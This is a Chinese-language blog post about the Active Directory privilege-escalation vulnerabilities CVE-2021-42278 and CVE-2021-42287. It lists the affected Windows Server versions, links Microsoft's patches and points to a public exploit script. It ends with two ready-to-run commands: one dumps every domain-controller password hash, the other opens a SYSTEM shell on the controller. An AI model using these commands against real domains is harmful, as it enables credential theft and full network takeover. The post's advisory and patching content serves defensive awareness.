CVE-2021-42278、CVE-2021-42287-AD域控一把梭-shell+hashdump

2021年12月14日 0条评论 5,964次阅读 1人点赞

CVE-2021-42278-AD域控-shell+hashdump

0x01 漏洞背景

12月9日，监测发现 Microsoft Windows Active Directory 域服务权限提升漏洞（CVE-2021-42278、CVE-2021-42287）相关利用PoC在互联网公开。攻击者可利用该漏洞将域内的普通用户权限提升到域管理员权限，由此造成风险和危害极大。

0x02 风险等级

严重

0x03 影响版本

已知受影响应用及组件：

※ CVE-2021-42278 受影响系统
￮ Windows Server 2012 R2
￮ Windows Server 2012 (Server Core installation)
￮ Windows Server 2012
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1
￮ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for x64-based Systems Service Pack 2
￮ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for 32-bit Systems Service Pack 2
￮ Windows Server 2016 (Server Core installation)
￮ Windows Server 2016
￮ Windows Server, version 20H2 (Server Core Installation)
￮ Windows Server, version 2004 (Server Core installation)
￮ Windows Server 2022 (Server Core installation)
￮ Windows Server 2019 (Server Core installation)
￮ Windows Server 2022
￮ Windows Server 2019
￮ Windows Server 2012 R2 (Server Core installation)

※ CVE-2021-42287 受影响系统
￮ Windows Server 2012 R2 (Server Core installation)
￮ Windows Server 2012 R2
￮ Windows Server 2012 (Server Core installation)
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1(Server Core installation)
￮ Windows Server 2012
￮ Windows Server 2008 R2 for x64-based Systems Service Pack 1
￮ Windows Server 2008 for x64-based Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for x64-based Systems Service Pack 2
￮ Windows Server 2008 for 32-bit Systems Service Pack 2(Server Core installation)
￮ Windows Server 2008 for 32-bit Systems Service Pack 2
￮ Windows Server 2016 (Server Core installation)
￮ Windows Server 2016
￮ Windows Server, version 20H2 (Server Core Installation)
￮ Windows Server, version 2004 (Server Core installation)
￮ Windows Server 2022 (Server Core installation)
￮ Windows Server 2022
￮ Windows Server 2019 (Server Core installation)
￮ Windows Server 2019

0x04 修复建议

目前官方已提供修复补丁，建议使用Windows Update完成补丁更新工作；
对于无法使用Windows Update自动更新的设备，可手动下载相关补丁进行更新，下载地址如下：
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42287
https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-42278

0x05 漏洞利用脚本（PY3）：

https://github.com/WazeHell/sam-the-admin

sam-the-admin-main.zip

读取域控的所有hash：
python3 sam_the_admin.py "test.com/test001:A122134!" -dc-ip 192.168.1.1 -dump 


读取域控system权限：
python3 sam_the_admin.py "test.com/test001:A122134!"212 -dc-ip 192.168.1.1 -shell

成功获取域控hash截图

《CVE-2021-42278、CVE-2021-42287-AD域控一把梭-shell+hashdump》